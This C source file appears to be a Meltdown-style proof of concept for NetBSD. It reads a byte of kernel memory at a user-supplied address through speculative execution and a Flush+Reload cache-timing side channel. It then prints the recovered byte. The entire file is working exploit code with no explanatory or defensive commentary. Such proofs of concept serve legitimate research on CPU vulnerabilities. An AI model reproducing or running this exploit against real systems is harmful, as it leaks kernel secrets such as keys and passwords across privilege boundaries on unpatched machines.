#include <sys/ioctl.h>
#include <sys/rnd.h>

#include <err.h>
#include <errno.h>
#include <fcntl.h>
#include <inttypes.h>
#include <setjmp.h>
#include <signal.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

const unsigned		cacheline_size = 64;
const unsigned		pgsz = 4096;
const unsigned		ntrials = 1000;

jmp_buf			reset;
uint64_t		kaddr;
uint8_t			*kptr;
void			*ubuf;
uint8_t			*uptr;
unsigned		vote[256];
uint8_t			perm[256];

static inline uint64_t
rdtsc_fenced(void)
{
	uint32_t lo, hi;

	asm volatile("rdtscp" : "=a"(lo), "=d"(hi) : : "%ecx");

	return ((uint64_t)hi << 32) | lo;
}

static inline void
clflush(const void *ptr)
{

	asm volatile("clflush (%0)" : : "r"(ptr));
}

static inline int
fpe(int x, int y)
{

	return x/y;
}

static inline uint8_t
core(const uint8_t *k, const uint8_t *u)
{
	unsigned long i;
	uint8_t v;

	do i = 4096*k[0]; while (i == 0);
	v = u[i];

	return v;
}

static void
shuffle(void)
{
	unsigned i;

	/* Fisher-Yates */
	for (i = 256; i --> 0;) {
		unsigned j = arc4random_uniform(i + 1);
		uint8_t pi = perm[i], pj = perm[j];
		perm[i] = pj;
		perm[j] = pi;
	}
}

static void
sighandler(int signo)
{
	uint64_t t0, t1, tmin;
	unsigned i, imin;
	volatile uint8_t ubyte;

	(void)signo;

	tmin = UINT64_MAX;
	imin = 0;
	for (i = 0; i < 256; i++) {
		t0 = rdtsc_fenced();
		ubyte = uptr[pgsz*perm[i]];
		t1 = rdtsc_fenced();
		if (t1 - t0 <= tmin) {
			tmin = t1 - t0;
			imin = perm[i];
		}
	}
	vote[imin]++;
	shuffle();
	longjmp(reset, 1);
}

#include <sys/rnd.h>

static void
prime(void)
{
	static int fd = -1;
	uint32_t entcnt;

	if (fd == -1) {
		if ((fd = open("/dev/urandom", O_RDONLY)) == -1)
			err(1, "open /dev/urandom");
	}

	ioctl(fd, RNDGETENTCNT, &entcnt);
}

int
main(int argc, char **argv)
{
	char *end;
	int error;
	volatile unsigned trial;
	volatile uint8_t ubyte;
	unsigned i, ibest, vbest;

	setprogname(argv[0]);
	if (argc != 2 && argc != 3)
		errx(1, "usage: %s <addr>\n", getprogname());

	errno = 0;
	kaddr = strtoumax(argv[1], &end, 0);
	if (end == argv[1] || end[0] != '\0' || errno)
		errx(1, "invalid address");
	kptr = (void *)(uintptr_t)kaddr;
	//fprintf(stderr, "kptr %p\n", kptr);

	/* initialize */
	for (i = 0; i < 256; i++)
		perm[i] = i;

	error = posix_memalign(&ubuf, 4096, 256*pgsz);
	if (error) {
		errno = error;
		err(1, "posix_memalign");
	}
	arc4random_buf(ubuf, 256*pgsz);

	uptr = (uint8_t *)ubuf + 43;
	//fprintf(stderr, "uptr %p\n", uptr);

	for (i = 0; i < ntrials; i++) {
		if (setjmp(reset) == 0)
			sighandler(SIGSEGV);
	}
	memset(vote, 0, sizeof vote);

	if (signal(SIGSEGV, &sighandler) == SIG_ERR)
		err(1, "signal");

	/* dry run to ramp up the CPU */
	for (trial = 0; trial < 10*ntrials; trial++) {
		if (setjmp(reset) == 0) {
			for (i = 0; i < 256; i++) {
				ubyte = uptr[i*pgsz];
				clflush(&uptr[i*pgsz]);
			}
			register uint8_t *uptr0 = uptr;
			register uint8_t *kptr0 = kptr;
			prime();
			//ubyte = fpe(1, 0);
			ubyte = core(kptr0, uptr0);
			return 123;
		}
	}
	memset(vote, 0, sizeof vote);

	for (trial = 0; trial < ntrials; trial++) {
		if (setjmp(reset) == 0) {
			for (i = 0; i < 256; i++) {
				ubyte = uptr[i*pgsz];
				clflush(&uptr[i*pgsz]);
			}
			register uint8_t *uptr0 = uptr;
			register uint8_t *kptr0 = kptr;
			prime();
			//ubyte = fpe(1, 0);
			ubyte = core(kptr0, uptr0);
			return 123;
		}
	}

	if (signal(SIGSEGV, SIG_DFL) == SIG_ERR)
		err(1, "signal");

	ibest = 0;
	vbest = vote[0];
	for (i = 0; i < 256; i++) {
		//fprintf(stderr, "vote[%02x] = %u\n", i, vote[i]);
		if (vote[i] > vbest) {
			ibest = i;
			vbest = vote[i];
		}
	}

	//fprintf(stderr, "kptr %p\n", kptr);
	if (printf("%c", (char)ibest) < 0)
		err(1, "printf");

	return 0;
}